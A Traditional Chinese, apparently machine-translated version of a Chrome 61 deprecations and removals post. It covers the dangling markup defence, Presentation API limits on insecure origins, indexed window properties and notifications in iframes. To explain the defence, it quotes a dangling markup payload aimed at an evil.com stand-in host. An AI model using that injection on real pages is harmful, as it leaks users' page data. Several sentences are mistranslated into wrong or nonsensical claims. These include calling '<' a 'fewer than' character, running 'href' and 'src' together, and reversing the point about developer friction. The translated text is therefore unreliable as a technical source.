Chrome 61 淘汰與移除功能

喬梅利
Joe Medley

在絕大多數的 Chrome 版本中,我們都發現大量的更新和改善項目,包含產品、效能和網路平台的功能。本文說明 Chrome 61 的淘汰和移除功能 (於 8 月 3 日推出 Beta 版)。這份清單隨時可能有所變動。

安全性與隱私權

封鎖網址包含「\n」和「<」字元的資源

有一種入侵行為,稱為「中斷標記植入」,會使用遭截斷的網址將資料傳送至外部端點。舉例來說,假設網頁含有 <img src='https://evil.com/?。由於網址沒有結尾引號,瀏覽器會讀取下一個出現的引號,並將封閉式字元視為單一網址。

Chrome 61 會限制 hrefsrc 屬性允許的字元集,藉此降低這個安全漏洞。具體來說,Chrome 會在發現新的行字元 (\n) 且少於字元 (<) 時停止處理網址。

如果開發人員允許換行使用且網址所含的字元數不足,則應改為逸出這些字元。

意圖移除 | Chrome 狀態追蹤工具 | Chromium 錯誤

淘汰並移除不安全內容中的 Presentation API

該公司發現,在不安全的來源上,發表 API 可做為在不安全的來源上遭駭的駭客。由於螢幕沒有網址列,因此這個 API 可用於假冒內容。您也能從執行簡報中竊取資料。

為配合 Blink 的意圖,移除不安全來源的強大功能,我們打算淘汰並移除對不安全內容下 Presentation API 的支援。自 Chrome 61 版起,PresentationRequest.start() 將無法在不安全的來源上執行。

意圖移除 | Chrome 狀態追蹤工具 | Chromium 錯誤

JavaScript

不允許定義 Windows 上已建立索引的屬性

過去,部分瀏覽器支援進行 JavaScript 指派,如下所示:

    window[0] = 1;

目前的 HTML 規格指出這確實違反 JavaScript 規格,因此 Chrome 61 已移除這項功能。自 2016 年 2 月起,Firefox 已符合法規。

Chromium 錯誤

移除不安全的 iframe 通知使用

來自 iframe 的權限要求可能會混淆使用者,因為很難區分包含的網頁來源和提出要求的 iframe 來源。如果要求範圍不明確,使用者就無法判斷要授予或拒絕權限。

禁止在 iframe 中使用通知,也能夠讓通知權限要求與推播通知的相關規定保持一致,這樣開發人員就會覺得阻礙。

需要這項功能的開發人員可以開啟新視窗來要求通知權限。

意圖移除 | Chrome 狀態追蹤工具 | Chromium 錯誤